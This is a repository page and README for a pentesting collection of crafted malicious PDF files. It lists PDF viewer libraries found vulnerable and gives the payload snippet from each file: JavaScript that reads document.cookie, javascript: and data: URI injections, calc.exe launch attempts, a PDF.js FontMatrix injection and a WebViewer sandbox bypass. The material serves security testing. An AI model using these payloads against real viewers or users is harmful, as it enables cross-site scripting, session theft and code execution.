https://github.com/luigigubello/PayloadsAllThePDFs

PDF Files for Web Pentesting
https://github.com/luigigubello/PayloadsAllThePDFs

pentesting web-pentest web-security

Last synced: 2 months ago
JSON representation

PDF Files for Web Pentesting

• Host: GitHub
• URL: https://github.com/luigigubello/PayloadsAllThePDFs
• Owner: luigigubello
• License: apache-2.0
• Created: 2021-04-02T00:58:58.000Z (almost 4 years ago)
• Default Branch: main
• Last Pushed: 2024-09-17T12:03:22.000Z (5 months ago)
• Last Synced: 2024-09-17T14:47:40.391Z (5 months ago)
• Topics: pentesting, web-pentest, web-security
• Homepage:
• Size: 1.03 MB
• Stars: 411
• Watchers: 6
• Forks: 59
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

• awesome-nicc - Payloads All The PDFs - \"A list of crafted malicious PDF files to test the security of PDF readers and tools.\" `Apache-2.0` `` (Entries / Exploitation)

README

        
# Payloads All The PDFs



A list of crafted malicious PDF files to test the security of PDF readers and tools.

**Write-Up:** [JavaScript-based PDF Viewers, Cross Site Scripting, and PDF files](https://gubello.me/blog/pdf-viewers-xss-and-pdf-files/)

### Vulnerabilities found

- [Foxit PDF SDK For Web](https://www.npmjs.com/package/@foxitsoftware/foxit-pdf-sdk-for-web-library) 7.5.0 (~600 weekly downloads)

- [PDFTron WebViewer](https://www.npmjs.com/package/@pdftron/webviewer) 7.2.0, 7.3.1, 8.6.1, 10.1.0, 10.7.2, 10.12.0 (~87k weekly downloads)

- [PSPDFKit for Web](https://www.npmjs.com/package/pspdfkit) 2021.4.1 (~13k weekly downloads)

- [Syncfusion ej2-pdfviewer](https://www.npmjs.com/package/@syncfusion/ej2-pdfviewer) 20.2.40 (~6.8k weekly downloads)

- [React PDF viewer](https://www.npmjs.com/package/@react-pdf-viewer/core) 3.6.0 (~34k weekly downloads)

- [PDF.js](https://www.npmjs.com/package/pdfjs-dist) 4.1.392 (~2 million weekly downloads)

## Payloads list

### payload1.pdf

**Line 31**. Understand if [Acrobat Javascript APIs](https://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/AcrobatDC_js_api_reference.pdf) are supported.

```

/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('confirm(document.cookie);');"))().next();)

```

**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.

```

/URI (data:text/html,alert\(2\);)

```

**Line 177**. Try to inject Javascript code using annotations.

```

<'>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>

```

### payload2.pdf

**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.

```

/URI (\">'>)

```

### payload3.pdf

**Line 31**. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.

```

/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\(""\);)

```

**Line 69**. Try to run remote commands on Windows.

```

/URI (file:///C:/Windows/system32/calc.exe)

```

### payload4.pdf

**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

```

/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)

```

**Line 69**. Try to run remote commands on Windows.

```

 /URI (START C:/\Windows/\system32/\calc.exe)

```

### payload5.pdf

**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

```

/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)

```

**Line 69**. Try to run arbitrary Javascript abusing the data URI scheme.

```

 /URI (javascript:confirm\(2\);)

```

### payload6.pdf

**Line 31**. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

```

 /JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'>'>)

```

### payload8.pdf

**Line 19**. Try to run arbitrary Javascript injected via `FontMatrix`. It works on vulnerable `PDF.js` versions. Proof-of-Concept created by [Rob Wu and Thomas Rinsma](https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/).

```

<< /BaseFont /SNCSTG+CMBX12 /FontDescriptor 6 0 R /FontMatrix [ 1 2 3 4 5 (1\); alert\('origin: '+window.origin+', pdf url: '+\(window.PDFViewerApplication?window.PDFViewerApplication.url:document.URL\)) ] /Subtype /Type1 /Type /Font >>

```

### payload9.pdf

**Line 32**. Javascript sandbox bypass in Apryse WebViewer SDK (10.9.x - 10.12.0) to run arbitrary embedded Javascript in PDFs.

```

/JS (app.alert\(1\); console.println\(delete window\); console.println\(delete confirm\); console.println\(delete document\); window.confirm\(document.cookie\);)

```

___

![Hack the planet](img/hack_the_planet.gif)

If you want to support me you can offer me a coffee ☕